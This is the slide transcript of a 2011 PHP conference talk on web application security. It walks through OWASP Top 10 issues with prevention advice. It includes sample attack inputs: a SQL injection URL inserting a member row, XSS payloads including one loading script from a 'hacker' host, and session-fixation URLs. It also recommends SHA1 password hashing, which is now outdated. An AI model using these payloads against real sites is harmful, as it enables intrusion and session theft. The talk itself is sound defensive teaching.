Phpnw security-20111009

Are you feeling secure – notes from the trenches Paul Lemon @anthonylime http://joind.in/3603

Introduction
- I am a web developer and have been for 13 years
- Former sound engineer to the obscure and poor
- Technical Director at MadeByPi
- I love what I do
PHP / Java / Actionscript / Javascript / C#
Wear a mean hairnet
About me

“ The problem of insecure software is perhaps the most important technical challenge of our time.” – OWASP Testing Guide Introduction. Photo courtesy http://www.flickr.com/photos/katescars/

Introduction
- Notes based on personal professional experience
Over 20+ third party tests on our applications
Development orientated
Simple code examples – not production code.
This presentation

Introduction
Open Web Application Security Project
Best resource for developers / analysts / testers
https://www.owasp.org /
OWASP

Introduction
SQL Injection
Cross-Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object References
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
OWASP Top 10

SQL Injection http://www.flickr.com/photos/andresrueda/2983149263/

Injection http://xkcd.com/327/

Injection http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name')VALUES ('paul.lemon@gmail.com','hello',‘paul',’Paul Lemon'); Sample Code

Injection
Confidential data can be disclosed
The results of the query may not visible in the HTML
Trial and error to iterate data in tables
Execute long running queries
Test for errors in page execution
Vulnerable to inserts / updates / defacement
How is it exploited

Injection Validation and Parameterised Query

Injection
- Validate all input.
Use PDO to create parameterised queries or
Use a ORM or Database Library (not your own!)
Set up your database permissions.
Don’t expose your queries (logging etc)
Code review
Don’t be complacent
How to prevent

Injection
Validation is not just for the user’s benefit
Cast to correct type i.e. intval / floatval / boolean
Whitelist Input ranges
- Reasonable minimums and maximums
- Whitelist with regular expression
- Blacklist with regular expression
- Validate Email / Urls
- Don’t rely on your model layer
A quick note about validation

XSS http://www.flickr.com/photos/andresrueda/2983149263/

XSS http://someserver/script.php?name=<script>alert();</script> or http://bit.ly/lYMcHjkj Sample XSS

XSS http:// host/script.php?name=<script src='http://hacker/script.js' /> Sample XSS

XSS Potential Exploits - Theft of session cookies - Insertion of content / forms etc - Redirection to malicious sites - Insertion of trojan downloads / keyloggers etc.

XSS
Varieties of XSS
Persistent - data is stored in the database
Nonpersistent - injected code is present in the URL/Request
DOM Based - javascript executed in the page reads the request

XSS Trusted Not Trusted
Posted Form
Querystring
Url
Cookies
HTTP Headers
Web application Browser

XSS – Trust zones Trusted Not Trusted API
Use HTTPS
Treat as user input
Web application

XSS – Trust zones Trusted Not Trusted Database
Database may have been compromised
Validation may have failed
Escape all output
Web application

XSS – Trust zones Trusted Not Trusted API Database Web application Browser

XSS – Trust zones Trusted Not Trusted API Database Your application should be modular too Web application Browser

XSS Escape all output
ENT_QUOTES option is important – double and single quotes
Page encoding is important
If you need HTML output use HTML Purifier

XSS Escape all output – context is important

XSS ?name=<script>alert("hello");</script>& link=javascript:alert('hello') Escape all output – context is important

XSS
Check your templating engine for XSS protection (options in Symfony 1/ Twig for escaping by default)
Context is important to the escaping used - Image and Hyperlinks - Javascript blocks
- CSS
There is not a definitive solution for PHP
https://www.owasp.org/index.php/ESAPI#tab=PHP 
Preventing XSS

XSS
Session cookie to use HTTPOnly in php.ini
Or use PHP function session_set_cookie_params
Cookies set as HTTPOnly

Session Exploits

Session Exploits
Session Fixation
Man in the middle attacks
Overview

Session Exploits
Allowing the session id to be passed on the querystring
Url is sent via email to potential victim
visit this url to the site http://localhost/?sessionid=1234
Victim logs in and this is attached to the session id
Sender uses the original session id and gains access
http://localhost/viewprofile?sessionid=1234
Session Fixation

Session Exploits
Do not allow session id to be passed on the querystring
Session Fixation – How to prevent

Session Exploits
Where the attacker has access to the machine
- First user notes down the session id on the computer
- Second user logs in and this is attached to the session id
- First user uses the original session id and gains access
Session Fixation

Session Exploits
Roll the session id when a user logs in
You can change the session id more frequently…
Session Fixation – How to prevent

Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Web application Username / Password

Session Exploits Man in the middle attacks User logs in… Session Id - Cookie HTTP POST Ahoy! Web application Username / Password

Session Exploits Man in the middle attacks Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits
- Login and authentication must always be over HTTPS
Passwords are personal and confidential
Users are not disciplined
(Store your passwords securely SHA1 / Salt )

Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Session Id - Cookie Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits
Authenticated session cookies should be delivered over SSL
Use HTTPS only option on session cookie
Use a separate domain if you can e.g. https://admin.yoursite/
Use a separate path for your session cookie

Session Exploits Man in the middle attacks

Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits Man in the middle attacks User visits a non-secure page Resource downloaded HTTP GET Curses! Web application Username / Password User logs in… Session Id - Cookie HTTP S POST Web application

Session Exploits Man in the middle attacks
Sometimes you cannot limit session to HTTPS
Users can log in and see non-secure data in public pages
There are still secure areas of the site
Use two cookies
Or make the user login again

Session Exploits Username / Password User logs in… Session Id – Cookie SECURE HTTP S POST Open Zone of Web application User visits a non-secure page Resource downloaded HTTP GET Session Id Extra Auth – Cookie SECURE Web application

Session Exploits Username / Password User logs in… Session Id – Cookie SECURE HTTP S POST Secure Zone of Web application User visits a non-secure page Response HTTP S GET/POST/PUT Session Id Extra Auth – Cookie SECURE Extra Auth – Cookie Web application

XSRF – Sorry no time

Conclusions

Conclusions Get someone else to do the work

Conclusions
Use a framework. I like symfony.
Use a well supported platform / CMS
Check their response to security issues
If there is no solution – check again (and again)
Get someone else to do the work

Conclusions
- Expect there to be faults – test as much as you can.
Expect there to be attacks – monitor your site
Stay on top of your versions – PHP / MySQL etc
Input validation is critical
Code for quality / Unit tests / regression
Code review
Operate with least privilege
Establish a build and deployment script
Read OWASP
Recommendations

XSS cheatlist: http://ha.ckers.org/xss.html
OWASP: https://www.owasp.org/index.php/Main_Page
HTML Purifier: http://htmlpurifier.org/
Context aware templates: http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html
MadeByPi: http://www.madebypi.co.uk
Conclusions Resources

Are you feeling secure – notes from the trenches Paul Lemon @anthonylime – paul.lemon@gmail.com http://joind.in/3603

http://protalk.me	64
http://lanyrd.com	8
http://a0.twimg.com	1
http://www.protalk.me	1
http://www.linkedin.com	1

Phpnw security-20111009

by Paul Lemon

Accessibility

Categories

Upload Details

Usage Rights

5 Embeds 75

Statistics

Phpnw security-20111009 Presentation Transcript